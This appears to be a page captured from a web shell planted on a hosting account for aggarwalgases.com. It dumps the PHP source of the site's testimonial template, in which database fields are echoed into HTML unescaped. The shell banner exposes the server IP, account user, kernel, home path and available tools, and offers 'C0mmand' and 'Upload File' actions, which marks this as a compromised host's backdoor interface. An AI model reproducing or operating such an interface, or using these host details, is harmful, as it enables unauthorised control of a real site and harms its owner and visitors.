Server IP : 103.53.40.154 / Your IP : 3.137.159.17 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/aggarwalgases.com/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!-- Testimonial area --> <div class="section section-padding bg-img overly-style-1 opacity-point-7" style="background-image:url(<?php echo $wspath?>assets/images/bg/bg-1.jpg); margin-bottom: 50px;"> <div class="container"> <div class="section-title text-center mb-lg-9 mb-md-7 mb-5"> <h2 class="title white">WHAT <span> CLIENTS</span> SAY?</h2> <p class="white">Client's Perspective: "Clear and Concise Section Headings for Enhanced Organization and Ease of Navigation.".</p> </div> <div class="testimonial-active swiper"> <div class="swiper-wrapper"> <?php $sqltest = "SELECT * FROM `tbl_testimonial`"; $runtest = mysqli_query($db,$sqltest) or die("Query Not run"); while($datatest = mysqli_fetch_assoc($runtest)){ ?> <div class="swiper-slide"> <div class="single-testimonial-wrapper"> <div class="testimonial-img-title"> <div class="testimonial-img"> <img src="<?php echo $wspath?>admin/images/property-image/<?php echo $datatest['test_image'];?>" alt="<?php echo $datatest['test_name'];?>"> </div> <div class="testimonial-title"> <h4><?php echo $datatest['test_name'];?></h4> <!--<span>Interior Designer</span>--> </div> </div> <p><?php echo $datatest['test_desc'];?></p> <div class="quote"> <i class="fa fa-quote-left"></i> </div> </div> </div> <!--<div class="swiper-slide">--> <!--<div class="single-testimonial-wrapper">--> <!--<div class="testimonial-img-title">--> <!--<div class="testimonial-img">--> <!--<img src="<?php echo $wspath?>assets/images/testimonial/client-2.png" alt="">--> <!--</div>--> <!--<div class="testimonial-title">--> <!--<h4>Shalu</h4>--> <!--<span>House Designer</span>--> <!--</div>--> <!--</div>--> <!--<p>"Thrilled with Aaliya Decor's Car Parking Tensile Structures—perfect blend of style, durability, and innovation."</p>--> <!--<div class="quote">--> <!--<i class="fa fa-quote-left"></i>--> <!--</div>--> <!--</div>--> <!--</div>--> <!--<div class="swiper-slide">--> <!--<div class="single-testimonial-wrapper">--> <!--<div class="testimonial-img-title">--> <!--<div class="testimonial-img">--> <!--<img src="<?php echo $wspath?>assets/images/testimonial/client-3.png" alt="">--> <!--</div>--> <!--<div class="testimonial-title">--> <!--<h4>Zubair Khan</h4>--> <!--<span>Businessman</span>--> <!--</div>--> <!--</div>--> <!--<p>"Entrance Tensile Structure by Aaliya Decor welcomes with architectural brilliance, leaving a lasting, positive impression."</p>--> <!--<div class="quote">--> <!--<i class="fa fa-quote-left"></i>--> <!--</div>--> <!--</div>--> <!--</div>--> <!--<div class="swiper-slide">--> <!--<div class="single-testimonial-wrapper">--> <!--<div class="testimonial-img-title">--> <!--<div class="testimonial-img">--> <!--<img src="<?php echo $wspath?>assets/images/testimonial/client-2.png" alt="">--> <!--</div>--> <!--<div class="testimonial-title">--> <!--<h4>Tulsi Shah</h4>--> <!--<span>Ui/UX Designer</span>--> <!--</div>--> <!--</div>--> <!--<p>"Aaliya Decor's Outdoor Tensile Structures seamlessly integrate beauty and functionality, transforming spaces with exceptional design."</p>--> <!--<div class="quote">--> <!--<i class="fa fa-quote-left"></i>--> <!--</div>--> <!--</div>--> <!--</div>--> <?php } ?> </div> </div> </div> </div>